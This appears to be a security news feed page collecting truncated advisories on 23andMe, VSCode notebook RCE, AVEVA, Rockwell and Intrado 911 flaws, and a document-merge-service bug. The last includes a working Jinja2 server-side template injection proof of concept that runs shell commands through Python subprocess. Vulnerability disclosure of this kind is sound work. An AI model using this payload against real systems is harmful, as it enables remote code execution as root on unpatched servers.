Security Headlines
Canada & UK Partner in Joint 23andMe Data Breach Investigation

The two jurisdictions will work together to investigate the credential-stuffing attack that put the personal data of millions at risk.

DARKReading (#web, #auth)
GHSA-v5gf-r78h-55q6: document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

### Impact
_What kind of vulnerability is it? Who is impacted?_

RCE via SSTI, as root, full takeover.

### Patches
_Has the problem been patched? What versions should users upgrade to?_

It has not been patched.

### References
_Are there any links users can visit to find out more?_

- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

### POC
Add the following to a document, upload and render it:

```jinja2
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %}
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}
whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}
uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}
{% endif %}
```

The index might be different, so to debug this first render a template with `...

US Leaders Dodge Questions About Israel’s Influence Campaign

Democratic leader Hakeem Jeffries has joined US intelligence officials in ignoring repeated inquiries about Israel’s “malign” efforts to covertly influence US voters.

Kernel Live Patch Security Notice LSN-0104-1

It was discovered that the ATA over Ethernet (AoE) driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

VSCode ipynb Remote Code Execution

VSCode bypasses its trust model when opening a Jupyter notebook (.ipynb) file. On versions v1.4.0 through v1.71.1, it is possible for the Jupyter notebook to embed HTML and JavaScript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. During testing, the first open of the Jupyter notebook resulted in pop-ups displaying errors that the payload .exe file could not be found. The second attempt at opening the Jupyter notebook resulted in successful execution. Successfully tested against VSCode 1.70.2 on Windows 10.

Red Hat Security Advisory 2024-3783-03

Red Hat Security Advisory 2024-3783-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.10. Issues addressed include bypass and use-after-free vulnerabilities.

AVEVA PI Web API

1. EXECUTIVE SUMMARY
CVSS v4 8.4
ATTENTION: Exploitable remotely/low attack complexity
Vendor: AVEVA
Equipment: PI Web API
Vulnerability: Deserialization of Untrusted Data

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to perform remote code execution.

3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of AVEVA PI Web API, a RESTful interface to the PI system, are affected:
AVEVA PI Web API: Versions 2023 and prior

3.2 Vulnerability Overview
3.2.1 Deserialization of Untrusted Data CWE-502
There is a vulnerability in AVEVA PI Web API that could allow malicious code to execute on the PI Web API environment under the privileges of an interactive user that was socially engineered to use API XML import functionality with content supplied by an attacker. CVE-2024-3468 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.6 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L). A C...

AVEVA PI Asset Framework Client

1. EXECUTIVE SUMMARY
CVSS v4 7.0
ATTENTION: Low attack complexity
Vendor: AVEVA
Equipment: PI Asset Framework Client
Vulnerability: Deserialization of Untrusted Data

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow malicious code execution.

3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of AVEVA PI Asset Framework Client, a tool to model either physical or logical objects, are affected:
PI Asset Framework Client: 2023
PI Asset Framework Client: 2018 SP3 P04 and all prior

3.2 Vulnerability Overview
3.2.1 Deserialization of Untrusted Data CWE-502
There is a vulnerability in AVEVA PI Asset Framework Client that could allow malicious code to execute on the PI System Explorer environment under the privileges of an interactive user that was socially engineered to import XML supplied by an attacker. CVE-2024-3467 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.3 has been calculated; the CVSS vector string is (AV:L/A...

Rockwell Automation ControlLogix, GuardLogix, and CompactLogix

1. EXECUTIVE SUMMARY
CVSS v4 8.3
ATTENTION: Low attack complexity
Vendor: Rockwell Automation
Equipment: ControlLogix, GuardLogix, CompactLogix
Vulnerability: Always-Incorrect Control Flow Implementation

2. RISK EVALUATION
Successful exploitation of this vulnerability could compromise the availability of the device.

3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Rockwell Automation reports that the following controllers are affected:
ControlLogix 5580: V34.011
GuardLogix 5580: V34.011
1756-EN4: V4.001
CompactLogix 5380: V34.011
Compact GuardLogix 5380: V34.011
CompactLogix 5380: V34.011
ControlLogix 5580: V34.011
CompactLogix 5480: V34.011

3.2 Vulnerability Overview
3.2.1 Always-Incorrect Control Flow Implementation CWE-670
Rockwell Automation was made aware of a vulnerability that causes all affected controllers on the same network to result in a major nonrecoverable fault (MNRF/Assert). This vulnerability could be exploited by sending abnormal packets to the mDNS port. If explo...

Intrado 911 Emergency Gateway

1. EXECUTIVE SUMMARY
CVSS v4 10.0
ATTENTION: Exploitable remotely/low attack complexity
Vendor: Intrado
Equipment: 911 Emergency Gateway (EGW)
Vulnerability: SQL Injection

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to execute malicious code, exfiltrate data, or manipulate the database.

3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of Intrado's 911 Emergency Gateway are affected:
911 Emergency Gateway (EGW): All versions

3.2 Vulnerability Overview
3.2.1 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') CWE-89
Intrado 911 Emergency Gateway login form is vulnerable to an unauthenticated blind time-based SQL injection, which may allow an attacker to execute malicious code, exfiltrate data, or manipulate the database. CVE-2024-1839 has been assigned to this vulnerability. A CVSS v3.1 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/...